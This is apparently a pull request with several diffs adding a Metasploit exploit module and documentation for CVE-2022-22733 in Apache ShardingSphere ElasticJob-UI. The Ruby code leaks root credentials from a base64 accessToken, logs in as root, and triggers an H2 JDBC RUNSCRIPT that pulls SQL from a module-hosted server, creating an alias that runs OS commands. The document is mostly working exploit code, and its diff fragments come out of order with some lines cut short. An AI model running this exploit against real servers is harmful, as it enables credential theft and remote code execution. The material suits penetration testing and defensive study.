### PR TITLE
Add module for CVE-2022-22733: Apache ShardingSphere ElasticJob-UI privilege escalation

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_shardingsphere_cve_2022_22733.md
+++ b/documentation/modules/exploit/multi/http/apache_shardingsphere_cve_2022_22733.md
@@ -1,0 +1,44 @@
+## Vulnerable Application
+### Overview
+Apache ShardingSphere ElasticJob-UI 3.x, including version 3.0.0, as well as prior alpha and beta versions, are 
+vulnerable to CVE-2022-22733, a vulnerability that allows an attacker who has a guest account to leak sensitive information
+and perform a privilege escalation attack.
+
+This vulnerability occurs because, when logging into the application via a POST request to `/api/login`, the server
+returns a response containing a `accessToken` field that contains a base64 encoded value. Upon decoding this value,
+an attacker can obtain the root username and password, as well as the guest username and password, in plaintext.
+
+By using these leaked credentials, an attacker can log into the application as the privileged `root` user, and then
+perform a privilege escalation attack by using the `/api/data-source/connectTest` endpoint to make a JDBC connection
+to an attacker controlled web server.
+
+By hosting a malicious SQL file on the web server, an attacker can execute arbitrary SQL statements on the 
+Apache ShardingSphere ElasticJob-UI server by abusing the built in ability to create aliases in SQL that execute
+arbitrary commands. By then executing the created alias, the attacker can gain RCE as the `XXX` user.
+
+### Setting up a vulnerable application
+
+1. `sudo docker run -p 8088:8088 -d apache/shardingsphere-elasticjob-lite-ui:3.0.0`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application by following the directions above.
+1. Start msfconsole
+1. Do: `use exploit/multi/http/apache_shardingsphere_cve_2022_22733`
+1. Do: `set RHOSTS target`
+1. Do: `set JDBC URL_to_your_malicious_sql_script`
+1. Do: `exploit`
+1. You should get `root` account credentials.
+
+## Options
+
+### JDBC
+URL to the malicious SQL file on the HTTP server to retrieve for the JDBC Attack. ex: http://ip:8000/poc.sql.
+### PASSWORD
+Password for authentication. The default value is `guest` for the guest account that comes with the application.
+### USERNAME
+The username to authenticate with. The default value is `guest` for the guest account that comes with the application.
+
+## Scenarios
+TODO

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -1,10 +1,3 @@
-require 'msf/core'
-require 'net/http'
-require 'openssl'
-require 'uri'
-require 'json'
-require 'base64'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -2,7 +2,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  prepend Msf::Exploi
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Start HTTP server
     @resource_uri = "/#{Rex::Text.rand_text_alphanumeric(8..20)}.sql"
-    jdbc_string = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@resource_uri}"
+    jdbc_string = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{@resource_uri}"
     print_status("Starting up our HTTP server on #{jdbc_string}")
     start_service({
       'Uri' => {
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    payload = "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';CALL EXEC (\"/bin/bash -c 'echo a > /tmp/test.txt'\")"
+    payload = "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"su18\";}';CALL EXEC ('echo A > /tmp/test')"
     print_status("#{datastore['SRVHOST']}:#{datastore['SRVPORT']} - Sending payload to target...")
     send_response(cli, payload)
   end

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -11,43 +11,56 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
-      'Description'    => %q{
-        This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
-      },
-      'Author'         => [ 'Zeyad Azima' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2022-22733' ],
-          ['URL', 'https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce'],
-          ['URL', 'https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation'],
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
+        'Description' => %q{
+          This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
+        },
+        'Author' => [
+          'Zeyad Azima', # Metasploit module and research to make PoC.
+          'Grant Willcox' # Tidying up on Metasploit module
         ],
-      'DefaultOptions' =>
-        {
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-22733'],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation'], # Writeup part 1
+          ['URL', 'https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce'], # Writeup part 2
+          ['URL', 'https://y4er.com/posts/cve-2022-22733-apache-shardingsphere-elasticjob-ui-rce/'], # First known public writeup
+          ['URL', 'https://github.com/apache/shardingsphere-elasticjob-ui/commit/f3afe51221cd2382e59afc4b9544c6c8a4448a99?diff=split'], # Patch in code
+          ['URL', 'https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6'] # Vendor acknowledgement
+        ],
+        'DefaultOptions' => {
           'RPORT' => 8088,
-          'SSL'   => false,
+          'SSL' => false,
           'DisablePayloadHandler' => true
         },
-      'Platform'       => ['win', 'linux'],
-      'Targets'        => [ [ 'Automatic', {} ] ],
-      'DisclosureDate' => '2022-01-20',
-      'DefaultTarget'  => 0
-      ))
+        'Platform' => ['win', 'linux'],
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DisclosureDate' => '2022-01-20',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
         OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
         OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
-      ])
+      ]
+    )
   end
 
   def check
     res = send_request_cgi({
       'method' => 'HEAD',
-      'uri'    => '/api/login',
+      'uri' => '/api/login'
     })
 
     if res && res.code == 200
@@ -60,15 +73,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown
   end
 
-
   def exploit
     print_status('Attempting to authenticate...')
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => '/api/login',
-      'ctype'  => 'application/json',
-      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
+      'uri' => '/api/login',
+      'ctype' => 'application/json',
+      'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
     })
 
     unless res && res.code == 200
@@ -90,16 +102,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => '/api/login',
-    'ctype'  => 'application/json',
-    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
-  })
+      'uri' => '/api/login',
+      'ctype' => 'application/json',
+      'data' => { 'username' => root_username, 'password' => root_password }.to_json
+    })
 
-  unless res && res.code == 200
-    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
-  end
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+    end
 
-  json_res = JSON.parse(res.body)
+    json_res = JSON.parse(res.body)
     access_token = json_res['model']['accessToken']
     decoded_access_token = Base64.decode64(access_token)
     decoded_json = JSON.parse(decoded_access_token)
@@ -107,43 +119,40 @@ class MetasploitModule < Msf::Exploit::Remote
     root_username = decoded_json['rootUsername']
     root_password = decoded_json['rootPassword']
 
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/api/login',
+      'ctype' => 'application/json',
+      'data' => { 'username' => root_username, 'password' => root_password }.to_json
+    })
 
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+    end
+
+    json_res = JSON.parse(res.body)
+    root_access_token = json_res['model']['accessToken']
+    print_good('Authenticated with root credentials successfully')
+    print_status('Attempting JDBC attack...')
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => '/api/login',
-    'ctype'  => 'application/json',
-    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
-  })
+      'uri' => '/api/data-source/connectTest',
+      'ctype' => 'application/json',
+      'headers' => {
+        'Access-Token' => root_access_token
+      },
+      'data' => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
+    })
 
-  unless res && res.code == 200
-    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'JDBC attack failed')
+    end
+
+    print_good('JDBC attack successful')
+  rescue JSON::ParserError
+    fail_with(Failure::UnexpectedReply, 'Failed to parse the server\'s responses')
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Connection failed")
   end
-
-  json_res = JSON.parse(res.body)
-  root_access_token = json_res['model']['accessToken']
-  print_good('Authenticated with root credentials successfully')
-  print_status('Attempting JDBC attack...')
-
-  res = send_request_cgi({
-    'method' => 'POST',
-    'uri'    => '/api/data-source/connectTest',
-    'ctype'  => 'application/json',
-    'headers' => {
-      'Access-Token' => root_access_token
-    },
-    'data'   => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
-  })
-
-  unless res && res.code == 200
-    fail_with(Failure::UnexpectedReply, 'JDBC attack failed')
-  end
-
-  print_good('JDBC attack successful')
-rescue JSON::ParserError
-  fail_with(Failure::UnexpectedReply, 'Failed to parse the server\'s responses')
-rescue ::Rex::ConnectionError
-  fail_with(Failure::Unreachable, "#{peer} - Connection failed")
-end
-
 end

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -67,11 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({
-      'method' => 'HEAD',
-      'uri' => '/api/login'
+      'method' => 'GET',
+      'uri' => '/'
     })
 
-    if res && res.code == 200
+    if res && res.code == 200 && res&.body&.match(/ShardingSphere ElasticJob UI/) && res&.body&.match(%r{/static/js/manifest/})
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -87,7 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => '/api/login',
       'ctype' => 'application/json',
-      'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
     })
 
     unless res && res.code == 200

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -94,8 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Authentication failed')
     end
 
-    json_res = JSON.parse(res.body)
-    access_token = json_res['model']['accessToken']
+    json_res = res.get_json_document
+    access_token = json_res.dig('model', 'accessToken')
+    fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field!') unless access_token
     decoded_access_token = Base64.decode64(access_token)
     decoded_json = JSON.parse(decoded_access_token)
 
@@ -118,8 +119,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
     end
 
-    json_res = JSON.parse(res.body)
-    access_token = json_res['model']['accessToken']
+    json_res = res.get_json_document
+    access_token = json_res.dig('model', 'accessToken')
+    fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field!') unless access_token
     decoded_access_token = Base64.decode64(access_token)
     decoded_json = JSON.parse(decoded_access_token)
 
@@ -138,7 +140,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     json_res = res.get_json_document
-    root_access_token = json_res['model']['accessToken']
+    root_access_token = json_res.dig('model', 'accessToken')
+    fail_with(Failure::UnexpectedReply, "Target did not respond with a response containing the root user's accessToken field!") unless root_access_token
     print_good('Authenticated with root credentials successfully')
     print_status('Attempting JDBC attack...')
 
@@ -158,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good('JDBC attack successful')
   rescue JSON::ParserError
-    fail_with(Failure::UnexpectedReply, 'Failed to parse the server\'s responses')
+    fail_with(Failure::UnexpectedReply, "Failed to parse the server's responses")
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Connection failed")
   end

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -1,0 +1,149 @@
+require 'msf/core'
+require 'net/http'
+require 'openssl'
+require 'uri'
+require 'json'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
+      'Description'    => %q{
+        This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
+      },
+      'Author'         => [ 'Zeyad Azima' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2022-22733' ],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce'],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation'],
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088,
+          'SSL'   => false,
+          'DisablePayloadHandler' => true
+        },
+      'Platform'       => ['win', 'linux'],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DisclosureDate' => '2022-01-20',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
+        OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'HEAD',
+      'uri'    => '/api/login',
+    })
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Connection failed")
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    print_status('Attempting to authenticate...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+      'ctype'  => 'application/json',
+      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Authentication failed')
+    end
+
+    json_res = JSON.parse(res.body)
+    access_token = json_res['model']['accessToken']
+    decoded_access_token = Base64.decode64(access_token)
+    decoded_json = JSON.parse(decoded_access_token)
+
+    root_username = decoded_json['rootUsername']
+    root_password = decoded_json['rootPassword']
+    print_good('Authenticated Successfully')
+    print_status("Root username: #{root_username}")
+    print_status("Root password: #{root_password}")
+
+    print_status('Attempting to authenticate with root credentials...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+    'ctype'  => 'application/json',
+    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+  end
+
+  json_res = JSON.parse(res.body)
+    access_token = json_res['model']['accessToken']
+    decoded_access_token = Base64.decode64(access_token)
+    decoded_json = JSON.parse(decoded_access_token)
+
+    root_username = decoded_json['rootUsername']
+    root_password = decoded_json['rootPassword']
+
+
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+    'ctype'  => 'application/json',
+    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+  end
+
+  json_res = JSON.parse(res.body)
+  root_access_token = json_res['model']['accessToken']
+  print_good('Authenticated with root credentials successfully')
+  print_status('Attempting JDBC attack...')
+
+  res = send_request_cgi({
+    'method' => 'POST',
+    'uri'    => '/api/data-source/connectTest',
+    'ctype'  => 'application/json',
+    'headers' => {
+      'Access-Token' => root_access_token
+    },
+    'data'   => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::UnexpectedReply, 'JDBC attack failed')
+  end
+
+  print_good('JDBC attack successful')
+rescue JSON::ParserError
+  fail_with(Failure::UnexpectedReply, 'Failed to parse the server\'s responses')
+rescue ::Rex::ConnectionError
+  fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+end
+
+end

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -2,6 +2,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploi
 
   def initialize(info = {})
     super(
@@ -9,7 +10,21 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
         'Description' => %q{
-          This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
+          Apache ShardingSphere ElasticJob-UI 3.x, including version 3.0.0, as well as prior alpha and beta versions, are
+          vulnerable to CVE-2022-22733, a vulnerability that allows an attacker who has a guest account to leak sensitive information
+          and perform a privilege escalation attack.
+
+          This vulnerability occurs because, when logging into the application via a POST request to "/api/login", the server
+          returns a response containing a "accessToken" field that contains a base64 encoded value. Upon decoding this value,
+          an attacker can obtain the root username and password, as well as the guest username and password, in plaintext.
+
+          By using these leaked credentials, an attacker can log into the application as the privileged "root" user, and then
+          perform a privilege escalation attack by using the "/api/data-source/connectTest" endpoint to make a JDBC connection
+          to an attacker controlled web server.
+
+          By hosting a malicious SQL file on the web server, an attacker can execute arbitrary SQL statements on the
+          Apache ShardingSphere ElasticJob-UI server by abusing the built in ability to create aliases in SQL that execute
+          arbitrary commands. By then executing the created alias, the attacker can gain RCE as the "XXX" user.
         },
         'Author' => [
           'Zeyad Azima', # Metasploit module and research to make PoC.
@@ -34,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2022-01-20',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [CRASH_SERVICE_DOWN],
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS]
         }
@@ -62,8 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
   rescue ::Rex::ConnectionError
-    print_error("#{peer} - Connection failed")
-    return Exploit::CheckCode::Unknown
+    return Exploit::CheckCode::Unknown("#{peer} - Connection failed")
   end
 
   def exploit
@@ -123,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
     end
 
-    json_res = JSON.parse(res.body)
+    json_res = res.get_json_document
     root_access_token = json_res['model']['accessToken']
     print_good('Authenticated with root credentials successfully')
     print_status('Attempting JDBC attack...')

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -1,6 +1,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -28,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Zeyad Azima', # Metasploit module and research to make PoC.
-          'Grant Willcox' # Tidying up on Metasploit module
+          'Grant Willcox' # Tidying up on Metasploit module, porting RCE component, adding attribution.
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -59,8 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
-        OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
-        OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest'])
       ]
     )
   end
@@ -71,26 +71,23 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/'
     })
 
-    if res && res.code == 200 && res&.body&.match(/ShardingSphere ElasticJob UI/) && res&.body&.match(%r{/static/js/manifest/})
-      return Exploit::CheckCode::Detected
+    if res && res.code == 200 && res&.body&.match(/ShardingSphere ElasticJob UI/) && res&.body&.match(%r{/static/js/manifest})
+      return Exploit::CheckCode::Detected('The target is running ShardingSphere ElasticJob UI, but we could not retrieve the version running.')
     else
-      return Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe('The target does not appear to be running ShardingSphere ElasticJob UI!')
     end
   rescue ::Rex::ConnectionError
     return Exploit::CheckCode::Unknown("#{peer} - Connection failed")
   end
 
   def exploit
-    print_status('Attempting to authenticate...')
+    print_status('Attempting to authenticate with provided credentials...')
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => '/api/login',
       'ctype' => 'application/json',
-      'vars_post' => {
-        'username' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD']
-      }
+      'data' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
     })
 
     unless res && res.code == 200
@@ -98,17 +95,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     json_res = res.get_json_document
+    unless json_res['success'] == true && json_res['errorCode'] == 0
+      fail_with(Failure::NoAccess, '200 OK returned, but authentication failed')
+    end
+
+    print_status('Getting accessToken details...')
     access_token = json_res.dig('model', 'accessToken')
-    fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field!') unless access_token
+    unless access_token
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field!')
+    end
+
+    print_good("Authenticated successfully as #{datastore['USERNAME']}")
+
+    print_status("Obtaining root credentials from accessToken field of the server's response...")
     decoded_access_token = Base64.decode64(access_token)
     decoded_json = JSON.parse(decoded_access_token)
 
     root_username = decoded_json['rootUsername']
     root_password = decoded_json['rootPassword']
-    print_good('Authenticated Successfully')
-    print_status("Root username: #{root_username}")
-    print_status("Root password: #{root_password}")
 
+    print_good("Root username: #{root_username}")
+    print_good("Root password: #{root_password}")
+
+    # Now that we have the leaked root credentials, validate them.
     print_status('Attempting to authenticate with root credentials...')
 
     res = send_request_cgi({
@@ -122,31 +131,35 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
     end
 
+    # At this point we need to validate that the accessToken is not a guest user to double check.
     json_res = res.get_json_document
-    access_token = json_res.dig('model', 'accessToken')
-    fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field!') unless access_token
-    decoded_access_token = Base64.decode64(access_token)
-    decoded_json = JSON.parse(decoded_access_token)
-
-    root_username = decoded_json['rootUsername']
-    root_password = decoded_json['rootPassword']
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => '/api/login',
-      'ctype' => 'application/json',
-      'data' => { 'username' => root_username, 'password' => root_password }.to_json
-    })
-
-    unless res && res.code == 200
-      fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+    unless json_res['success'] == true && json_res['errorCode'] == 0 && json_res.dig('model', 'isGuest') == false && json_res.dig('model', 'username') == 'root'
+      fail_with(Failure::NoAccess, '200 OK returned, but authentication failed as root user!')
     end
 
-    json_res = res.get_json_document
+    # Finally double check we actually got the accessToken for the root user.
     root_access_token = json_res.dig('model', 'accessToken')
-    fail_with(Failure::UnexpectedReply, "Target did not respond with a response containing the root user's accessToken field!") unless root_access_token
-    print_good('Authenticated with root credentials successfully')
+    unless root_access_token
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with a response containing an accessToken field when logging in as root!')
+    end
+
+    print_good('Successfully logged in as the root user!')
+
+    # Start the JDBC attack now that we have appropriate permissions to do a test JDBC connection.
     print_status('Attempting JDBC attack...')
+
+    # Start HTTP server
+    @resource_uri = "/#{Rex::Text.rand_text_alphanumeric(8..20)}.sql"
+    jdbc_string = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@resource_uri}"
+    print_status("Starting up our HTTP server on #{jdbc_string}")
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => @resource_uri
+      }
+    })
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -155,11 +168,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'Access-Token' => root_access_token
       },
-      'data' => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
+      'data' => { 'name' => Rex::Text.rand_text_alphanumeric(8..20), 'driver' => 'org.postgresql.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{jdbc_string}'", 'username' => Rex::Text.rand_text_alphanumeric(4..20), 'password' => Rex::Text.rand_text_alphanumeric(4..20) }.to_json
     })
 
     unless res && res.code == 200
       fail_with(Failure::UnexpectedReply, 'JDBC attack failed')
+    end
+
+    json_res = res.get_json_document
+    unless json_res['success'] == true
+      fail_with(Failure::UnexpectedReply, "JDBC attack failed. The error message was #{json_res['errorMsg']}")
     end
 
     print_good('JDBC attack successful')
@@ -167,5 +185,16 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "Failed to parse the server's responses")
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+  end
+
+  def on_request_uri(cli, request)
+    unless request.raw_uri == @resource_uri
+      vprint_error("Request came in but it wasn't for the right URI!")
+      return
+    end
+
+    payload = "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';CALL EXEC ('calc.exe')"
+    print_status("#{datastore['SRVHOST']}:#{datastore['SRVPORT']} - Sending payload to target...")
+    send_response(cli, payload)
   end
 end

--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'Access-Token' => root_access_token
       },
-      'data' => { 'name' => Rex::Text.rand_text_alphanumeric(8..20), 'driver' => 'org.postgresql.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{jdbc_string}'", 'username' => Rex::Text.rand_text_alphanumeric(4..20), 'password' => Rex::Text.rand_text_alphanumeric(4..20) }.to_json
+      'data' => { 'name' => Rex::Text.rand_text_alphanumeric(8..20), 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{jdbc_string}'", 'username' => Rex::Text.rand_text_alphanumeric(4..20), 'password' => Rex::Text.rand_text_alphanumeric(4..20) }.to_json
     })
 
     unless res && res.code == 200
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    payload = "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';CALL EXEC ('calc.exe')"
